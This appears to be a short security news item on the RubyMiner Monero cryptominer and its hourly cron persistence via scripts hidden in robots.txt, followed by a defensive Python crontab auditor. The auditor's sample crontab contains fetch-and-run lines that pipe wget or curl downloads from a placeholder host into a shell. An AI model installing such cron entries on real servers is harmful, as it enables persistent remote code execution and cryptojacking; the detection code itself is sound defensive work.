Researchers at Check Point and Certego have discovered a new malware variant targeting servers running Linux and Windows. RubyMiner is a Monero cryptocurrency miner designed to attack outdated servers. Attacks using it began on January 9th, 2018.
Researchers noted a number of distinctive features of attacks using RubyMiner: the exploit code contains a series of shell commands; the attackers add a new cron job that runs every hour; each hour, cron downloads a script hosted online; the downloaded script is stored in the robots.txt file on various domains; the script then downloads and installs a modified version of the legitimate XMRig application for mining the Monero cryptocurrency.
According to Check Point, RubyMiner has already infected about 700 servers. In the customized version of XMRig that the malware downloads, the researchers found the address of a cryptocurrency wallet. Judging by it, the operators have already managed to earn $540 for their efforts.
Cron is a classic daemon used to run tasks periodically at specified times. Regular actions are described by instructions placed in crontab files and in special directories.
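A defender can check crontab contents for the persistence pattern described above. The following is an added example, not code from Check Point, Certego or the malware itself: it flags any cron entry that downloads a script and pipes it to a shell (a generalization of the reported case), and annotates entries that run hourly or fetch from a robots.txt URL. The function names and the sample crontab are assumptions made for illustration.

```python
import re

FETCH = re.compile(r"\b(?:wget|curl)\b")                       # downloader invoked
PIPE_TO_SHELL = re.compile(r"\|\s*(?:\S*/)?(?:ba|da|z)?sh\b")  # output piped into a shell
URL = re.compile(r"https?://[^\s'\"|;]+", re.I)
ENV_LINE = re.compile(r"^[A-Za-z_]\w*\s*=")                    # e.g. MAILTO=root

def parse_entry(line, has_user_field=False):
    """Return (schedule_fields, command), or None for comments, blanks and env lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    n_sched = 1 if line.startswith("@") else 5      # "@hourly cmd" vs "m h dom mon dow cmd"
    skip = n_sched + (1 if has_user_field else 0)   # /etc/crontab, /etc/cron.d add a user column
    parts = line.split(None, skip)
    return (parts[:n_sched], parts[skip]) if len(parts) > skip else None

def at_least_hourly(schedule):
    """True for @hourly, or when hour, day, month and weekday are all '*'."""
    return schedule == ["@hourly"] or schedule[1:] == ["*", "*", "*", "*"]

def audit(crontab_text, has_user_field=False):
    """Return [(line_no, reasons)] for entries that download a script and pipe it to a shell."""
    findings = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        entry = parse_entry(line, has_user_field)
        if not entry or not (FETCH.search(entry[1]) and PIPE_TO_SHELL.search(entry[1])):
            continue
        schedule, command = entry
        reasons = ["download piped to shell"]
        if at_least_hourly(schedule):
            reasons.append("runs every hour or more often")
        if any(u.lower().split("?")[0].endswith("/robots.txt") for u in URL.findall(command)):
            reasons.append("script fetched from robots.txt")
        findings.append((no, reasons))
    return findings

# Constructed sample crontab; example.invalid is a placeholder, not an indicator.
SAMPLE = """\
# m h dom mon dow command
MAILTO=root
15 3 * * * /usr/local/bin/backup.sh
1 * * * * wget -q -O - http://example.invalid/robots.txt 2>/dev/null | bash >/dev/null 2>&1
@daily curl -s https://example.invalid/install.sh | sh
0 * * * * /usr/bin/curl -s https://example.invalid/health > /dev/null
"""

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

Feed `audit()` the output of `crontab -l` for each user, and pass `has_user_field=True` for `/etc/crontab` and files under `/etc/cron.d`.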
Cryptocurrency mining using someone else's equipment is not a new idea, but it is always a good idea to make sure all your hardware is running up to date with the latest security patches.